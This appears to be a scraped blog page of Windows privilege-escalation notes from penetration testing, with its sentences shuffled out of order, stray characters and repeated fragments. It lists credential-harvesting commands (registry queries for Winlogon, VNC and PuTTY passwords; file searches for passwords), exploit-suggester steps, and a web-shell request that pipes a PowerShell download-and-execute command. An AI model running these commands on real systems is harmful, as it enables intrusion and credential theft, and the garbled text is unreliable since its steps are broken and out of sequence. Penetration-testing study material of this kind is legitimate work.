This is also interesting to us! Kernel exploits So someone in the local network can connect to it, but not someone from the internet. Local address 192.168.1.9 means that the service is only listening for connections from the local network. Local address 127.0.0.1 means that the service is only listening for connection from the your PC. This means that anyone can connect to it. This means that it can receive a connection from the network card, from the loopback interface or any other interface. Local address 0.0.0.0 means that the service is listening on all interfaces. So how should we interpret the netstat output? If that is the case, maybe you can make a remote forward to access it. Compare that to the scan you did from the outside.ĭoes it contain any ports that are not accessible from the outside? netstat -anoĮxample output: Proto Local address Remote address State User Inode PID/Program name These services might be more vulnerable since they are not meant to be seen from the outside. Like a printer interface, or something like that. It is also common to have different administration applications that is only accessible from inside the network/machine. For example a MySQL server might not be accessible from the outside, for security reasons. Sometimes there are services that are only accessible from inside the network. Reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" Reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" Reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" Reg query "HKCU\Software\ORL\WinVNC3\Password" Meterpreter explit suggester password#Wmic qfe get Caption,Description,HotFixID,InstalledOnĬleartext Passwords Search for them findstr /si password *.txtĭir /s *pass* = *cred* = *vnc* = *.config* # What users/localgroups are on the machine? We need to know what users have privileges. Sherlock view-source:10.10.10.X/shell.php?cmd=echo IEX (New-Object Net.WebClient).DownloadString(" | powershell -noprofile -īefore we start looking for privilege escalation opportunities we need to understand a bit about the machine. The output shows either public exploits (E), or Metasploit modules (M) as indicated by the character value Windows-exploit-suggester.py -database -mssb.xlsx -systeminfo win7sp1-systeminfo.txt Meterpreter explit suggester windows#Windows Exploit Suggester windows-exploit-suggester.py -update We now have a low-privileges shell that we want to escalate into a privileged shell. Metasploit Web Delivery (Meterpreter Session) Meterpreter explit suggester how to#Common ports/services and how to use themīroken Authentication or Session Managementĭefault Layout of Apache on Different Versions
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |